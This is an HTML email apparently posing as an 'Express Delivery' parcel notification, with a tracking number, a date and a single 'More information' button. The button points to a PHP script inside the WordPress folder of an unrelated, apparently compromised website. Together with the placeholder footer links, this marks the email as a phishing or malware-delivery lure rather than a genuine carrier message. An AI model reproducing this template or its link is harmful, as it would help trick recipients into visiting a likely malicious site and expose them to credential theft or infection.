<html>
<head> <title>Your parcel is waiting for you</title>
<style>
body {
font-family: font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, "Helvetica Neue", Arial, sans-serif; font-size: 18px;
font-weight: normal;
color: #000000; } hr { border: 1px solid #c0c0c0;
}
span {
font-size: 18px; color: #808080;
}
a {
color: #808080; text-decoration: underline;
} h1 {
font-size: 36px;
font-weight: bold;
padding: 0px;
margin: 0px; }
.button {
display: inline-block; padding: 8px 16px; background-color: #03ad3d; color: #ffffff;
font-size: 18px; font-weight: bold;
white-space: nowrap;
text-align: center; text-decoration: none;
}
</style> </head> <body> <h1>Express Delivery</h1> #366575 <hr> <br />
<span> 2/07/2022
</span>
<br />
<br />
<b> Your parcel is waiting for you. </b>
<br /> <br /> <a href="http://www.nvcbiotech.com/wp-content/constituencyf.php?utm_source=81385&utm_content=1970" class="button">
More information
</a> <br />
<br />
<a href="#">Terms of Use</a> | <a href="#">Privacy Notice</a> | <a href="#">Terms and Conditions of Carriage</a>
</body>
</html>